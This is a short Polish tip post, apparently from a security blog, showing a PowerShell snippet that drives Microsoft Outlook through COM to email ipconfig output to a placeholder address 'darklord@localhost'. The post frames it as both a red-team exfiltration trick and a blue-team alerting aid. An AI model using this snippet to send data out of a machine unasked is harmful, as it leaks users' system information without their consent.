Przykład onelinera, który wysyła wynik polecenia
ipconfig
mailem z wykorzystaniem zainstalowanego i skonfigurowanego
Microsoft Outlooka. Dla
red teamów jest to ciekawy sposób na eksfiltrację danych, z kolei
blue teamy mogą to wykorzystać w swoich skryptach jako mechanizm powiadamiania o różnych wydarzeniach.
Głównymi bohaterami sa tutaj oczywiście sam
Microsoft Outlook oraz
cmdlet New-Object, za którego pomocą tworzymy nowy obiekt
COM. Żeby całość była bardziej czytelna, moglibyśmy to zapisać tak:
$Outlook = New-Object -ComObject Outlook.Application
$Mail = $Outlook.CreateItem(0)
$Mail.To = "darklord@localhost"
$Mail.Subject = "ip"
$Mail.Body = ipconfig|Out-String
$Mail.Send()
Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.